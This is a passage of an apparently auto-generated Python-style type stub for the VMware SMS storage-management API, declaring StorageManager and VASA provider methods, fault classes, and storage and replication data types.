         # throws vim.fault.AlreadyExists, sms.fault.ProviderRegistrationFault
         return sms.Task()
      def unregisterProvider(providerId=""): # sms.StorageManager.unregisterProvider
         # throws vim.fault.NotFound, sms.fault.ProviderUnregistrationFault
         return sms.Task()
      def queryProvider(): # sms.StorageManager.queryProvider
         # throws sms.fault.QueryExecutionFault
         return [ sms.provider.Provider() ]
      def queryArray(providerId=[ "" ] or None): # sms.StorageManager.queryArray
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.StorageArray() ]
      def queryProcessorAssociatedWithArray(arrayId=""): # sms.StorageManager.queryProcessorAssociatedWithArray
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.StorageProcessor() ]
      def queryPortAssociatedWithArray(arrayId=""): # sms.StorageManager.queryPortAssociatedWithArray
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.StoragePort() ]
      def queryPortAssociatedWithLun(scsi3Id="", arrayId=""): # sms.StorageManager.queryPortAssociatedWithLun
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return sms.storage.StoragePort()
      def queryLunAssociatedWithPort(portId="", arrayId=""): # sms.StorageManager.queryLunAssociatedWithPort
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.StorageLun() ]
      def queryArrayAssociatedWithLun(canonicalName=""): # sms.StorageManager.queryArrayAssociatedWithLun
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return sms.storage.StorageArray()
      def queryPortAssociatedWithProcessor(processorId="", arrayId=""): # sms.StorageManager.queryPortAssociatedWithProcessor
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.StoragePort() ]
      def queryLunAssociatedWithArray(arrayId=""): # sms.StorageManager.queryLunAssociatedWithArray
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.StorageLun() ]
      def queryFileSystemAssociatedWithArray(arrayId=""): # sms.StorageManager.queryFileSystemAssociatedWithArray
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.StorageFileSystem() ]
      def queryDatastoreCapability(datastore=vim.Datastore()): # sms.StorageManager.queryDatastoreCapability
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return sms.storage.StorageCapability()
      def queryHostAssociatedWithLun(scsi3Id="", arrayId=""): # sms.StorageManager.queryHostAssociatedWithLun
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ vim.HostSystem() ]
      def queryVmfsDatastoreAssociatedWithLun(scsi3Id="", arrayId=""): # sms.StorageManager.queryVmfsDatastoreAssociatedWithLun
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return vim.Datastore()
      def queryNfsDatastoreAssociatedWithFileSystem(fileSystemId="", arrayId=""): # sms.StorageManager.queryNfsDatastoreAssociatedWithFileSystem
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return vim.Datastore()
      def queryDrsMigrationCapabilityForPerformance(srcDatastore=vim.Datastore(), dstDatastore=vim.Datastore()): # sms.StorageManager.queryDrsMigrationCapabilityForPerformance
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return False
      def queryDrsMigrationCapabilityForPerformanceEx(datastore=[ vim.Datastore() ]): # sms.StorageManager.queryDrsMigrationCapabilityForPerformanceEx
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return sms.storage.DrsMigrationCapabilityResult()
      def queryStorageContainer(containerSpec=sms.storage.StorageContainerSpec() or None): # sms.StorageManager.queryStorageContainer
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return sms.storage.StorageContainerResult()
      def queryAssociatedBackingStoragePool(entityId="" or None, entityType="" or None): # sms.StorageManager.queryAssociatedBackingStoragePool
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.BackingStoragePool() ]
      def queryDatastoreBackingPoolMapping(datastore=[ vim.Datastore() ]): # sms.StorageManager.queryDatastoreBackingPoolMapping
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ sms.storage.DatastoreBackingPoolMapping() ]
      def refreshCACertificatesAndCRLs(providerId=[ "" ] or None): # sms.StorageManager.refreshCACertificatesAndCRLs
         # throws vim.fault.NotFound, sms.fault.CertificateRefreshFailed
         return sms.Task()
      def queryFaultDomain(filter=sms.FaultDomainFilter() or None): # sms.StorageManager.queryFaultDomain
         # throws vim.fault.NotFound, sms.fault.QueryExecutionFault
         return [ vim.vm.replication.FaultDomainId() ]
      def queryReplicationGroupInfo(rgFilter=sms.ReplicationGroupFilter()): # sms.StorageManager.queryReplicationGroupInfo
         # throws sms.fault.QueryExecutionFault
         return [ sms.storage.replication.GroupOperationResult() ]
   class Task(vmodl.ManagedObject): # sms.Task
      def queryResult(): # sms.Task.queryResult
         return {}
      def queryInfo(): # sms.Task.queryInfo
         return sms.TaskInfo()
   class TaskInfo(vmodl.DynamicData): # sms.TaskInfo
      key = ""
      task = sms.Task()
      object = vmodl.ManagedObject()
      error = vmodl.MethodFault()
      result = {}
      startTime = vmodl.DateTime()
      completionTime = vmodl.DateTime()
      state = ""
      progress = 0
      class State(Enum): # sms.TaskInfo.State
         queued = 0
         running = 1
         success = 2
         error = 3
   # Namespace of fault (exception) types raised by SMS operations.
   class fault(object): # (unknown name)
      class AuthConnectionFailed(vim.fault.NoPermission): # sms.fault.AuthConnectionFailed
         pass
      class CertificateRefreshFailed(vmodl.MethodFault): # sms.fault.CertificateRefreshFailed
         providerId = [ "" ]
      class CertificateRevocationFailed(vmodl.MethodFault): # sms.fault.CertificateRevocationFailed
         pass
      class DuplicateEntry(vmodl.MethodFault): # sms.fault.DuplicateEntry
         pass
      class InactiveProvider(vmodl.MethodFault): # sms.fault.InactiveProvider
         mapping = [ sms.storage.FaultDomainProviderMapping() ]
      class InvalidLogin(vmodl.MethodFault): # sms.fault.InvalidLogin
         pass
      class InvalidProfile(vmodl.MethodFault): # sms.fault.InvalidProfile
         pass
      class InvalidSession(vim.fault.NoPermission): # sms.fault.InvalidSession
         sessionCookie = ""
      class MultipleSortSpecsNotSupported(vmodl.fault.InvalidArgument): # sms.fault.MultipleSortSpecsNotSupported
         pass
      class NotSupportedByProvider(vmodl.MethodFault): # sms.fault.NotSupportedByProvider
         pass
      class ProviderBusy(vmodl.MethodFault): # sms.fault.ProviderBusy
         pass
      class ProviderConnectionFailed(vmodl.RuntimeFault): # sms.fault.ProviderConnectionFailed
         pass
      class ProviderOutOfProvisioningResource(vmodl.MethodFault): # sms.fault.ProviderOutOfProvisioningResource
         provisioningResourceId = ""
         availableBefore = 0
         availableAfter = 0
         total = 0
         isTransient = False
      class ProviderOutOfResource(vmodl.MethodFault): # sms.fault.ProviderOutOfResource
         pass
      class ProviderRegistrationFault(vmodl.MethodFault): # sms.fault.ProviderRegistrationFault
         pass
      class ProviderSyncFailed(vmodl.MethodFault): # sms.fault.ProviderSyncFailed
         pass
      class ProviderUnavailable(vmodl.MethodFault): # sms.fault.ProviderUnavailable
         pass
      class ProviderUnregistrationFault(vmodl.MethodFault): # sms.fault.ProviderUnregistrationFault
         pass
      class ProxyRegistrationFailed(vmodl.RuntimeFault): # sms.fault.ProxyRegistrationFailed
         pass
      class QueryExecutionFault(vmodl.MethodFault): # sms.fault.QueryExecutionFault
         pass
      class QueryNotSupported(vmodl.fault.InvalidArgument): # sms.fault.QueryNotSupported
         entityType = sms.EntityReference.EntityType()
         relatedEntityType = sms.EntityReference.EntityType()
      class ResourceInUse(vim.fault.ResourceInUse): # sms.fault.ResourceInUse
         deviceIds = [ sms.storage.replication.DeviceId() ]
      class ServiceNotInitialized(vmodl.RuntimeFault): # sms.fault.ServiceNotInitialized
         pass
      class SyncInProgress(sms.fault.ProviderSyncFailed): # sms.fault.SyncInProgress
         pass
      class TooMany(vmodl.MethodFault): # sms.fault.TooMany
         maxBatchSize = 0
      # Replication-specific fault sub-namespace.
      class replication(object): # (unknown name)
         class ReplicationFault(vmodl.MethodFault): # sms.fault.replication.ReplicationFault
            pass
         class SyncOngoing(sms.fault.replication.ReplicationFault): # sms.fault.replication.SyncOngoing
            task = sms.Task()
         class AlreadyDone(sms.fault.replication.ReplicationFault): # sms.fault.replication.AlreadyDone
            pass
         class InvalidFunctionTarget(sms.fault.replication.ReplicationFault): # sms.fault.replication.InvalidFunctionTarget
            pass
         class InvalidReplicationState(sms.fault.replication.ReplicationFault): # sms.fault.replication.InvalidReplicationState
            desiredState = [ "" ]
            currentState = ""
         class NoReplicationTarget(sms.fault.replication.ReplicationFault): # sms.fault.replication.NoReplicationTarget
            pass
         class NoValidReplica(sms.fault.replication.ReplicationFault): # sms.fault.replication.NoValidReplica
            deviceId = sms.storage.replication.DeviceId()
         class PeerNotReachable(sms.fault.replication.ReplicationFault): # sms.fault.replication.PeerNotReachable
            pass
      class CertificateAuthorityFault(sms.fault.ProviderRegistrationFault): # sms.fault.CertificateAuthorityFault
         faultCode = 0
      class CertificateNotImported(sms.fault.ProviderRegistrationFault): # sms.fault.CertificateNotImported
         pass
      class CertificateNotTrusted(sms.fault.ProviderRegistrationFault): # sms.fault.CertificateNotTrusted
         certificate = ""
      class IncorrectUsernamePassword(sms.fault.ProviderRegistrationFault): # sms.fault.IncorrectUsernamePassword
         pass
      class InvalidCertificate(sms.fault.ProviderRegistrationFault): # sms.fault.InvalidCertificate
         certificate = ""
      class InvalidUrl(sms.fault.ProviderRegistrationFault): # sms.fault.InvalidUrl
         url = ""
      class NoCommonProviderForAllBackings(sms.fault.QueryExecutionFault): # sms.fault.NoCommonProviderForAllBackings
         pass
      class ProviderNotFound(sms.fault.QueryExecutionFault): # sms.fault.ProviderNotFound
         pass
   # Namespace of VASA provider management types.
   class provider(object): # (unknown name)
      class AlarmFilter(vmodl.DynamicData): # sms.provider.AlarmFilter
         alarmStatus = ""
         alarmType = ""
         entityType = ""
         entityId = [ {} ]
         pageMarker = ""
      class AlarmResult(vmodl.DynamicData): # sms.provider.AlarmResult
         storageAlarm = [ sms.storage.StorageAlarm() ]
         pageMarker = ""
      class Provider(vmodl.ManagedObject): # sms.provider.Provider
         def queryProviderInfo(): # sms.provider.Provider.queryProviderInfo
            return sms.provider.ProviderInfo()
      class ProviderInfo(vmodl.DynamicData): # sms.provider.ProviderInfo
         uid = ""
         name = ""
         description = ""
         version = ""
      class ProviderSpec(vmodl.DynamicData): # sms.provider.ProviderSpec
         name = ""
         description = ""
      class VasaProvider(sms.provider.Provider): # sms.provider.VasaProvider
         def sync(arrayId="" or None): # sms.provider.VasaProvider.sync
            # throws sms.fault.ProviderSyncFailed
            return sms.Task()
         def refreshCertificate(): # sms.provider.VasaProvider.refreshCertificate
            # throws sms.fault.CertificateRefreshFailed
            return sms.Task()
         def revokeCertificate(): # sms.provider.VasaProvider.revokeCertificate
            # throws sms.fault.CertificateRevocationFailed
            return sms.Task()
         def reconnect(): # sms.provider.VasaProvider.reconnect
            # throws sms.fault.InvalidCertificate, sms.fault.ProviderConnectionFailed
            return sms.Task()
         def queryReplicationPeer(faultDomainId=[ vim.vm.replication.FaultDomainId() ] or None): # sms.provider.VasaProvider.queryReplicationPeer
            # throws sms.fault.ProviderUnavailable, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.QueryExecutionFault
            return [ sms.storage.replication.QueryReplicationPeerResult() ]
         def queryReplicationGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None): # sms.provider.VasaProvider.queryReplicationGroup
            # throws sms.fault.ProviderUnavailable, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.QueryExecutionFault
            return [ sms.storage.replication.GroupOperationResult() ]
         def queryPointInTimeReplica(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None, queryParam=sms.storage.replication.QueryPointInTimeReplicaParam() or None): # sms.provider.VasaProvider.queryPointInTimeReplica
            # throws sms.fault.ProviderUnavailable, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.QueryExecutionFault
            return [ sms.storage.replication.GroupOperationResult() ]
         def testFailoverReplicationGroupStart(testFailoverParam=sms.storage.replication.TestFailoverParam()): # sms.provider.VasaProvider.testFailoverReplicationGroupStart
            # throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
            return sms.Task()
         def testFailoverReplicationGroupStop(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None, force=False): # sms.provider.VasaProvider.testFailoverReplicationGroupStop
            # throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault, sms.fault.NotSupportedByProvider
            return sms.Task()
         def promoteReplicationGroup(promoteParam=sms.storage.replication.PromoteParam()): # sms.provider.VasaProvider.promoteReplicationGroup
            # throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
            return sms.Task()
         def syncReplicationGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None, pitName=""): # sms.provider.VasaProvider.syncReplicationGroup
            # throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault, sms.fault.TooMany
            return sms.Task()
         def prepareFailoverReplicationGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None): # sms.provider.VasaProvider.prepareFailoverReplicationGroup
            # throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
            return sms.Task()
         def failoverReplicationGroup(failoverParam=sms.storage.replication.FailoverParam()): # sms.provider.VasaProvider.failoverReplicationGroup
            # throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
            return sms.Task()
         def reverseReplicateGroup(groupId=[ vim.vm.replication.ReplicationGroupId() ] or None): # sms.provider.VasaProvider.reverseReplicateGroup
            # throws sms.fault.ProviderUnavailable, sms.fault.ProviderOutOfResource, sms.fault.InactiveProvider, sms.fault.TooMany, sms.fault.ProviderBusy, sms.fault.replication.ReplicationFault
            return sms.Task()
         def queryActiveAlarm(alarmFilter=sms.provider.AlarmFilter() or None): # sms.provider.VasaProvider.queryActiveAlarm
            # throws vim.fault.NotFound, sms.fault.ProviderBusy, sms.fault.InactiveProvider, sms.fault.ProviderUnavailable, sms.fault.QueryExecutionFault
            return sms.provider.AlarmResult()
      class VasaProviderInfo(sms.provider.ProviderInfo): # sms.provider.VasaProviderInfo
         url = ""
         certificate = ""
         status = ""
         statusFault = vmodl.MethodFault()
         vasaVersion = ""
         namespace = ""
         lastSyncTime = ""
         supportedVendorModelMapping = [ sms.provider.VasaProviderInfo.SupportedVendorModelMapping() ]
         supportedProfile = [ "" ]
         supportedProviderProfile = [ "" ]
         relatedStorageArray = [ sms.provider.VasaProviderInfo.RelatedStorageArray() ]
         providerId = ""
         certificateExpiryDate = ""
         certificateStatus = ""
         serviceLocation = ""
         needsExplicitActivation = False
         maxBatchSize = 0
         retainVasaProviderCertificate = False
         arrayIndependentProvider = False
         type = ""
         category = ""
         priority = 0
         failoverGroupId = ""
         class CertificateStatus(Enum): # sms.provider.VasaProviderInfo.CertificateStatus
            valid = 0
            expirySoftLimitReached = 1
            expiryHardLimitReached = 2
            expired = 3
            invalid = 4
         class RelatedStorageArray(vmodl.DynamicData): # sms.provider.VasaProviderInfo.RelatedStorageArray
            arrayId = ""
            active = False
            manageable = False
            priority = 0
         class SupportedVendorModelMapping(vmodl.DynamicData): # sms.provider.VasaProviderInfo.SupportedVendorModelMapping
            vendorId = ""
            modelId = ""
         class VasaProviderStatus(Enum): # sms.provider.VasaProviderInfo.VasaProviderStatus
            online = 0
            offline = 1
            syncError = 2
            unknown = 3
            connected = 4
            disconnected = 5
         class VasaProviderProfile(Enum): # sms.provider.VasaProviderInfo.VasaProviderProfile
            blockDevice = 0
            fileSystem = 1
            capability = 2
         class ProviderProfile(Enum): # sms.provider.VasaProviderInfo.ProviderProfile
            ProfileBasedManagement = 0
            Replication = 1
         class Type(Enum): # sms.provider.VasaProviderInfo.Type
            PERSISTENCE = 0
            DATASERVICE = 1
            UNKNOWN = 2
         class Category(Enum): # sms.provider.VasaProviderInfo.Category
            internal = 0
            external = 1
      class VasaProviderSpec(sms.provider.ProviderSpec): # sms.provider.VasaProviderSpec
         username = ""
         password = ""
         url = ""
         certificate = ""
      class VmodlVasaProviderSpec(object): # (unknown name)
         class AuthenticationType(Enum): # sms.provider.VmodlVasaProviderSpec.AuthenticationType
            LoginByToken = 0
            UseSessionId = 1
   # Namespace of storage-topology and replication data types.
   class storage(object): # (unknown name)
      class AlarmStatus(Enum): # sms.storage.AlarmStatus
         Red = 0
         Green = 1
         Yellow = 2
      class AlarmType(Enum): # sms.storage.AlarmType
         SpaceCapacityAlarm = 0
         CapabilityAlarm = 1
         StorageObjectAlarm = 2
         ObjectAlarm = 3
         ComplianceAlarm = 4
         ManageabilityAlarm = 5
         ReplicationAlarm = 6
      class BackingConfig(vmodl.DynamicData): # sms.storage.BackingConfig
         thinProvisionBackingIdentifier = ""
         deduplicationBackingIdentifier = ""
         autoTieringEnabled = False
         deduplicationEfficiency = 0
         performanceOptimizationInterval = 0
      class BackingStoragePool(vmodl.DynamicData): # sms.storage.BackingStoragePool
         uuid = ""
         type = ""
         capacityInMB = 0
         usedSpaceInMB = 0
         class BackingStoragePoolType(Enum): # sms.storage.BackingStoragePool.BackingStoragePoolType
            thinProvisioningPool = 0
            deduplicationPool = 1
            thinAndDeduplicationCombinedPool = 2
      class DatastoreBackingPoolMapping(vmodl.DynamicData): # sms.storage.DatastoreBackingPoolMapping
         datastore = [ vim.Datastore() ]
         backingStoragePool = [ sms.storage.BackingStoragePool() ]
      class DatastorePair(vmodl.DynamicData): # sms.storage.DatastorePair
         datastore1 = vim.Datastore()
         datastore2 = vim.Datastore()
      class DrsMigrationCapabilityResult(vmodl.DynamicData): # sms.storage.DrsMigrationCapabilityResult
         recommendedDatastorePair = [ sms.storage.DatastorePair() ]
         nonRecommendedDatastorePair = [ sms.storage.DatastorePair() ]
      class EntityType(Enum): # sms.storage.EntityType
         StorageArrayEntity = 0
         StorageProcessorEntity = 1
         StoragePortEntity = 2
         StorageLunEntity = 3
         StorageFileSystemEntity = 4
         StorageCapabilityEntity = 5
         CapabilitySchemaEntity = 6
         CapabilityProfileEntity = 7
         DefaultProfileEntity = 8
         ResourceAssociationEntity = 9
         StorageContainerEntity = 10
         StorageObjectEntity = 11
         MessageCatalogEntity = 12
         ProtocolEndpointEntity = 13
         VirtualVolumeInfoEntity = 14
         BackingStoragePoolEntity = 15
         FaultDomainEntity = 16
         ReplicationGroupEntity = 17
      class FaultDomainProviderMapping(vmodl.DynamicData): # sms.storage.FaultDomainProviderMapping
         activeProvider = sms.provider.Provider()
         faultDomainId = [ vim.vm.replication.FaultDomainId() ]
      class FileSystemInfo(vmodl.DynamicData): # sms.storage.FileSystemInfo
         fileServerName = ""
         fileSystemPath = ""
         ipAddress = ""
      class LunHbaAssociation(vmodl.DynamicData): # sms.storage.LunHbaAssociation
         canonicalName = ""
         hba = [ vim.host.HostBusAdapter() ]
      class NameValuePair(vmodl.DynamicData): # sms.storage.NameValuePair
         parameterName = ""
         parameterValue = ""
      class StorageAlarm(vmodl.DynamicData): # sms.storage.StorageAlarm
         alarmId = 0
         alarmType = ""
         containerId = ""
         objectId = ""
         objectType = ""
         status = ""
         alarmTimeStamp = vmodl.DateTime()
         messageId = ""
         parameterList = [ sms.storage.NameValuePair() ]
         alarmObject = {}
      class StorageArray(vmodl.DynamicData): # sms.storage.StorageArray
         name = ""
         uuid = ""
         vendorId = ""
         modelId = ""
         firmware = ""
         alternateName = [ "" ]
         supportedBlockInterface = [ "" ]
         supportedFileSystemInterface = [ "" ]
         supportedProfile = [ "" ]
         priority = 0
         class BlockDeviceInterface(Enum): # sms.storage.StorageArray.BlockDeviceInterface
            fc = 0
            iscsi = 1
            fcoe = 2
            otherBlock = 3
         class FileSystemInterface(Enum): # sms.storage.StorageArray.FileSystemInterface
            nfs = 0
            otherFileSystem = 1
         class VasaProfile(Enum): # sms.storage.StorageArray.VasaProfile
            blockDevice = 0
            fileSystem = 1
            capability = 2
            policy = 3
            object = 4
            statistics = 5
            storageDrsBlockDevice = 6
            storageDrsFileSystem = 7
      class StorageCapability(vmodl.DynamicData): # sms.storage.StorageCapability
         uuid = ""
         name = ""
         description = ""
      class StorageContainer(vmodl.DynamicData): # sms.storage.StorageContainer
         uuid = ""
         name = ""
         maxVvolSizeInMB = 0
         providerId = [ "" ]
         arrayId = [ "" ]
      class StorageContainerResult(vmodl.DynamicData): # sms.storage.StorageContainerResult
         storageContainer = [ sms.storage.StorageContainer() ]
         providerInfo = [ sms.provider.ProviderInfo() ]
      class StorageContainerSpec(vmodl.DynamicData): # sms.storage.StorageContainerSpec
         containerId = [ "" ]
      class StorageFileSystem(vmodl.DynamicData): # sms.storage.StorageFileSystem
         uuid = ""
         info = [ sms.storage.FileSystemInfo() ]
         nativeSnapshotSupported = False
         thinProvisioningStatus = ""
         type = ""
         version = ""
         backingConfig = sms.storage.BackingConfig()
         class FileSystemInterfaceVersion(Enum): # sms.storage.StorageFileSystem.FileSystemInterfaceVersion
            NFSV3_0 = 0
      class StorageLun(vmodl.DynamicData): # sms.storage.StorageLun
         uuid = ""
         vSphereLunIdentifier = ""
         vendorDisplayName = ""
         capacityInMB = 0
         usedSpaceInMB = 0
         lunThinProvisioned = False
         alternateIdentifier = [ "" ]
         drsManagementPermitted = False
         thinProvisioningStatus = ""
         backingConfig = sms.storage.BackingConfig()
      class StoragePort(vmodl.DynamicData): # sms.storage.StoragePort
         uuid = ""
         type = ""
         alternateName = [ "" ]
      class StorageProcessor(vmodl.DynamicData): # sms.storage.StorageProcessor
         uuid = ""
         alternateIdentifer = [ "" ]
      class ThinProvisioningStatus(Enum): # sms.storage.ThinProvisioningStatus
         RED = 0
         YELLOW = 1
         GREEN = 2
      # Replication data-type sub-namespace.
      class replication(object): # (unknown name)
         class DeviceId(vmodl.DynamicData): # sms.storage.replication.DeviceId
            pass
         class FailoverParam(vmodl.DynamicData): # sms.storage.replication.FailoverParam
            isPlanned = False
            checkOnly = False
            replicationGroupsToFailover = [ sms.storage.replication.FailoverParam.ReplicationGroupData() ]
            policyAssociations = [ sms.storage.replication.FailoverParam.PolicyAssociation() ]
            class ReplicationGroupData(vmodl.DynamicData): # sms.storage.replication.FailoverParam.ReplicationGroupData
               groupId = vim.vm.replication.ReplicationGroupId()
               pitId = sms.storage.replication.PointInTimeReplicaId()
            class PolicyAssociation(vmodl.DynamicData): # sms.storage.replication.FailoverParam.PolicyAssociation
               id = sms.storage.replication.DeviceId()
               policyId = ""
               datastore = vim.Datastore()
         class FaultDomainInfo(vim.vm.replication.FaultDomainId): # sms.storage.replication.FaultDomainInfo
            name = ""
            description = ""
            storageArrayId = ""
            children = [ vim.vm.replication.FaultDomainId() ]
            provider = sms.provider.Provider()
         class GroupInfo(vmodl.DynamicData): # sms.storage.replication.GroupInfo
            groupId = vim.vm.replication.ReplicationGroupId()
         class GroupOperationResult(vmodl.DynamicData): # sms.storage.replication.GroupOperationResult
            groupId = vim.vm.replication.ReplicationGroupId()
            warning = [ vmodl.MethodFault() ]
         class PointInTimeReplicaId(vmodl.DynamicData): # sms.storage.replication.PointInTimeReplicaId
            id = ""
         class PromoteParam(vmodl.DynamicData): # sms.storage.replication.PromoteParam
            isPlanned = False
            replicationGroupsToPromote = [ vim.vm.replication.ReplicationGroupId() ]
         class QueryPointInTimeReplicaParam(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaParam
            replicaTimeQueryParam = sms.storage.replication.QueryPointInTimeReplicaParam.ReplicaQueryIntervalParam()
            pitName = ""
            tags = [ "" ]
            class ReplicaQueryIntervalParam(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaParam.ReplicaQueryIntervalParam
               fromDate = vmodl.DateTime()
               toDate = vmodl.DateTime()
               number = 0
         class QueryPointInTimeReplicaSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.QueryPointInTimeReplicaSuccessResult
            replicaInfo = [ sms.storage.replication.QueryPointInTimeReplicaSuccessResult.PointInTimeReplicaInfo() ]
            class PointInTimeReplicaInfo(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaSuccessResult.PointInTimeReplicaInfo
               id = sms.storage.replication.PointInTimeReplicaId()
               pitName = ""
               timeStamp = vmodl.DateTime()
               tags = [ "" ]
         class QueryPointInTimeReplicaSummaryResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.QueryPointInTimeReplicaSummaryResult
            intervalResults = [ sms.storage.replication.QueryPointInTimeReplicaSummaryResult.ReplicaIntervalQueryResult() ]
            class ReplicaIntervalQueryResult(vmodl.DynamicData): # sms.storage.replication.QueryPointInTimeReplicaSummaryResult.ReplicaIntervalQueryResult
               fromDate = vmodl.DateTime()
               toDate = vmodl.DateTime()
               number = 0
         class QueryReplicationGroupSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.QueryReplicationGroupSuccessResult
            rgInfo = sms.storage.replication.GroupInfo()
         class QueryReplicationPeerResult(vmodl.DynamicData): # sms.storage.replication.QueryReplicationPeerResult
            sourceDomain = vim.vm.replication.FaultDomainId()
            targetDomain = [ vim.vm.replication.FaultDomainId() ]
            error = [ vmodl.MethodFault() ]
            warning = [ vmodl.MethodFault() ]
         class ReplicaId(vmodl.DynamicData): # sms.storage.replication.ReplicaId
            id = ""
         class ReplicationState(Enum): # sms.storage.replication.ReplicationState
            SOURCE = 0
            TARGET = 1
            FAILEDOVER = 2
            INTEST = 3
            REMOTE_FAILEDOVER = 4
         class ReverseReplicationSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.ReverseReplicationSuccessResult
            newGroupId = vim.vm.replication.DeviceGroupId()
         class SourceGroupInfo(sms.storage.replication.GroupInfo): # sms.storage.replication.SourceGroupInfo
            name = ""
            description = ""
            state = ""
            replica = [ sms.storage.replication.SourceGroupInfo.ReplicationTargetInfo() ]
            memberInfo = [ sms.storage.replication.SourceGroupMemberInfo() ]
            class ReplicationTargetInfo(vmodl.DynamicData): # sms.storage.replication.SourceGroupInfo.ReplicationTargetInfo
               targetGroupId = vim.vm.replication.ReplicationGroupId()
               replicationAgreementDescription = ""
         class SourceGroupMemberInfo(vmodl.DynamicData): # sms.storage.replication.SourceGroupMemberInfo
            deviceId = sms.storage.replication.DeviceId()
            targetId = [ sms.storage.replication.SourceGroupMemberInfo.TargetDeviceId() ]
            class TargetDeviceId(vmodl.DynamicData): # sms.storage.replication.SourceGroupMemberInfo.TargetDeviceId
               domainId = vim.vm.replication.FaultDomainId()
               deviceId = sms.storage.replication.ReplicaId()
         class SyncReplicationGroupSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.SyncReplicationGroupSuccessResult
            timeStamp = vmodl.DateTime()
            pitId = sms.storage.replication.PointInTimeReplicaId()
            pitName = ""
         class TargetGroupInfo(sms.storage.replication.GroupInfo): # sms.storage.replication.TargetGroupInfo
            sourceInfo = sms.storage.replication.TargetGroupInfo.TargetToSourceInfo()
            state = ""
            devices = [ sms.storage.replication.TargetGroupMemberInfo() ]
            isPromoteCapable = False
            class TargetToSourceInfo(vmodl.DynamicData): # sms.storage.replication.TargetGroupInfo.TargetToSourceInfo
               sourceGroupId = vim.vm.replication.ReplicationGroupId()
               replicationAgreementDescription = ""
         class TargetGroupMemberInfo(vmodl.DynamicData): # sms.storage.replication.TargetGroupMemberInfo
            replicaId = sms.storage.replication.ReplicaId()
            sourceId = sms.storage.replication.DeviceId()
            targetDatastore = vim.Datastore()
         class TestFailoverParam(sms.storage.replication.FailoverParam): # sms.storage.replication.TestFailoverParam
            pass
         class VVolId(sms.storage.replication.DeviceId): # sms.storage.replication.VVolId
            id = ""
         class VirtualDiskId(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualDiskId
            diskId = ""
         class VirtualDiskKey(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualDiskKey
            vmInstanceUUID = ""
            deviceKey = 0
         class VirtualDiskMoId(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualDiskMoId
            vcUuid = ""
            vmMoid = ""
            diskKey = ""
         class VirtualMachineId(sms.storage.replication.DeviceId): # sms.storage.replication.VirtualMachineId
            pass
         class VirtualMachineMoId(sms.storage.replication.VirtualMachineId): # sms.storage.replication.VirtualMachineMoId
            vcUuid = ""
            vmMoid = ""
         class VirtualMachineUUID(sms.storage.replication.VirtualMachineId): # sms.storage.replication.VirtualMachineUUID
            vmInstanceUUID = ""
         class FailoverSuccessResult(sms.storage.replication.GroupOperationResult): # sms.storage.replication.FailoverSuccessResult
            newState = ""
            pitId = sms.storage.replication.PointInTimeReplicaId()
            pitIdBeforeFailover = sms.storage.replication.PointInTimeReplicaId()
            recoveredDeviceInfo = [ sms.storage.replication.FailoverSuccessResult.RecoveredDevice() ]
            timeStamp = vmodl.DateTime()
            class RecoveredDiskInfo(vmodl.DynamicData): # sms.storage.replication.FailoverSuccessResult.RecoveredDiskInfo
               deviceKey = 0
               dsUrl = ""
               diskPath = ""
            class RecoveredDevice(vmodl.DynamicData): # sms.storage.replication.FailoverSuccessResult.RecoveredDevice
